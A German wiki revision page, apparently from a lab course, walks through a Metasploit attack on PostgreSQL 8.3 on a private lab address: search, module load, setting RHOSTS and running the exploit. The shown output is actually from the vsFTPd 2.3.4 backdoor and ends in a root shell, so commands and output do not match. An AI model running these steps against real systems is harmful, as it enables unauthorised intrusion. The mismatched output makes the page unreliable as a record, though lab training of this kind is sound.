Metasploit postgres exploit: Unterschied zwischen den Versionen

Aus Xinux Wiki
Zur Navigation springen Zur Suche springen
(Die Seite wurde neu angelegt: „=Gefundene Version= ;<nowiki>[*] Nmap: 5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7</nowiki> =Gibt es eingebaute Schwachstellen zum vsftp Server?= *m…“)
 
Zeile 7: Zeile 7:
 
================
 
================
  
   #  Name                                 Disclosure Date  Rank      Check  Description
+
   #  Name                                     Disclosure Date  Rank      Check  Description
   -  ----                                 ---------------  ----      -----  -----------
+
   -  ----                                     ---------------  ----      -----  -----------
     13  exploit/linux/postgres/postgres_payload                     2007-06-05       excellent Yes    PostgreSQL for Linux Payload Execution
+
     13  exploit/linux/postgres/postgres_payload   2007-06-05   excellent   Yes    PostgreSQL for Linux Payload Execution
  
 
</pre>
 
</pre>
 +
 
=Module laden=
 
=Module laden=
 
*msf6 > use  exploit/linux/postgres/postgres_payload
 
*msf6 > use  exploit/linux/postgres/postgres_payload

Version vom 19. Oktober 2022, 16:16 Uhr

Gefundene Version

[*] Nmap: 5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7

Gibt es eingebaute Schwachstellen zum vsftp Server?

  • msf6 > search postgres
Matching Modules
================

   #  Name                                      Disclosure Date  Rank       Check  Description
   -  ----                                      ---------------  ----       -----  -----------
    13  exploit/linux/postgres/postgres_payload   2007-06-05    excellent    Yes    PostgreSQL for Linux Payload Execution

Module laden

  • msf6 > use exploit/linux/postgres/postgres_payload

info

  • msf6 exploit(/linux/postgres/postgres_payload) > info

Wir müssen den RHOST setzen

  • msf6 exploit(/linux/postgres/postgres_payload) > set RHOSTS 10.0.10.105

Und Attacke

  • msf6 exploit(/linux/postgres/postgres_payload) > run
[*] 10.0.10.105:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 10.0.10.105:21 - USER: 331 Please specify the password.
[+] 10.0.10.105:21 - Backdoor service has been spawned, handling...
[+] 10.0.10.105:21 - UID: uid=0(root) gid=0(root)
[*] Found shell.
Wir haben kein Prompt aber eine Shell